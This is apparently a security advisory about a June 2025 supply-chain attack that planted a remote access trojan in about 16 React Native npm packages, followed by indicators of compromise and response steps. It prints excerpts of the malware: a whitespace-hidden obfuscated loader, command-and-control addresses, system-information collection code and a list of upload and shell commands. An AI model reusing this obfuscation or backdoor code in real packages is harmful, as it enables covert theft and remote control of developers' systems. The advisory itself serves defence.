Security Alert – 16 Widely-Used React Native Packages Breached

A sweeping, coordinated attack has struck the heart of the React Native ecosystem, threatening thousands of developers and organizations globally.

Beginning on the evening of June 6, 2025, malicious actors successfully breached at least 16 widely-used npm packages with millions of weekly downloads.

Among the affected packages are @react-native-aria/focus, @react-native-aria/utils, @react-native-aria/overlays, @react-native-aria/interactions, and several more maintained under the React Native Aria umbrella.

The attack also targeted the popular utility library @gluestack-ui/utils.

These compromised packages collectively receive well over a million weekly downloads, putting countless projects at risk of backdoor infiltration.

The attackers exploited maintainer credentials or package ownership, releasing new versions that contained sophisticated, obfuscated backdoors.

The payloads are not only persistent but also evasive, leveraging whitespace-based obfuscation to hide malicious logic from plain view in code editors.

Technical Details of the Attack

The Backdoor Payload

The breach began with the release of @react-native-aria/focus@0.2.10 at 21:33 GMT on June 6, 2025. The attackers made a single, subtle change to the lib/commonjs/index.js file, inserting a line of code that utilized whitespace to embed an off-screen payload, invisible in editors without word wrapping. The following is a pseudo-excerpt of the technique used:

javascriptglobal['_V']='8-npm13';global['r']=require;(function(){var mGB='',hsR=615-604;function EgY(i){...};var Uwn=EgY('koosdciqucxbhcmgtanzpylfwurjtrtvrnoes').substr(0,hsR);var VVy='...';var EiK=EgY[Uwn];var ogb='';var ZML=EiK;var Bfb=EiK(ogb,EgY(VVy));var cag=Bfb(EgY('...'));var mfa=ZML(mGB,cag);mfa(9993);return 6161})()

Note: Full code omitted for brevity and security—see original source for obfuscated content.

This technique allowed the attackers to deploy a persistent remote access trojan (RAT) that activates upon the package being loaded in a Node.js environment.

Core Malicious Functionality

The RAT performs a variety of exfiltration and remote control operations:

• System Fingerprinting: Collects hostname, username, OS type, Node.js and system paths, and runtime environment context.
• Command and Control (C2): Connects to attacker-controlled servers via socket.io, using one of two IPs dynamically selected based on a version tag.

javascriptconst J = d.startsWith('A4') ? 'http://136.0.9[.]8:3306' : "http://85.239.62[.]36:3306";
const K = d.startsWith('A4') ? "http://136.0.9[.]8:27017" : "http://85.239.62[.]36:27017";

• Automated Dependency Installation: Attempts to install required tooling (e.g., socket.io-client, axios, form-data) to establish persistence if missing.
• Remote Control: Accepts commands over the established WebSocket, enabling operations such as file upload, directory traversal, process manipulation, and arbitrary command execution.
• Command Examples: The RAT responds to a variety of commands, including:
  • ss_info: Exposes system metadata (OS, Node.js version, timestamps, paths).
  • ss_ip: Queries a public IP API to expose network geolocation and public IP.
  • ss_upf/ss_upd: Supports file and directory upload to attacker servers.
  • ss_fcd: Changes working directory for follow-up commands.
  • ss_stop: Stops ongoing upload operations.
  • Arbitrary shell commands: Executes shell commands in the context of the running process.

Here’s a snippet of how the RAT collects and exposes system information:

javascriptif (a0 === 'ss_info') {
  a1 = "* _V = " + d + "\n* VERSION = " + "250602" + "\n* OS_INFO = " + q + "\n* NODE_PATH = " + r + "\n* NODE_VERSION = " + s + "\n* STARTUP_TIME = " + u + "\n* STARTUP_PATH = " + v + "\n* __dirname = " + (typeof __dirname === 'undefined' ? "undefined" : __dirname) + "\n* __filename = " + (typeof __filename === 'undefined' ? "undefined" : __filename) + "\n";
}

Persistence and Evasion

The RAT is designed to evade detection via:

• Obfuscation: Use of whitespace and string manipulation to hide code logic.
• Dynamic Payloads: Configuration-driven backdoor behavior using environment variables and injected version tags.
• Persistence on Windows: Potential attempts to drop files at:text%LOCALAPPDATA%\Programs\Python\Python3127 The presence of unknown executables or scripts in this location is a strong indicator of compromise.

Indicators of Compromise

Compromised Packages and Versions:

Suspicious IPs:
Check firewall/outbound connections for:

• 136.0.9.8
• 85.239.62.36

How to Respond

• Immediate Action: Remove any impacted package versions. Check your dependency tree and lockfiles for these versions.
• Security Scanning: Use SAST/DAST tools and threat detection systems to scan for the presence of the backdoor code and outbound connections to known C2 IPs.
• Incident Response: If any of these packages are found in your environment, assume compromise. Rotate all credentials, review logs for unusual activity, and consider quarantining affected systems.
• System Hardening: On Windows, scan for suspicious files at:text%LOCALAPPDATA%\Programs\Python\Python3127

This supply chain attack is ongoing and evolving, with new malicious versions potentially emerging.

The attackers have demonstrated both persistence and sophistication, leveraging obfuscation and dynamic payloads to evade detection.

The React Native and npm communities are urged to remain vigilant, monitor communications from maintainers, and apply security best practices to protect against future threats.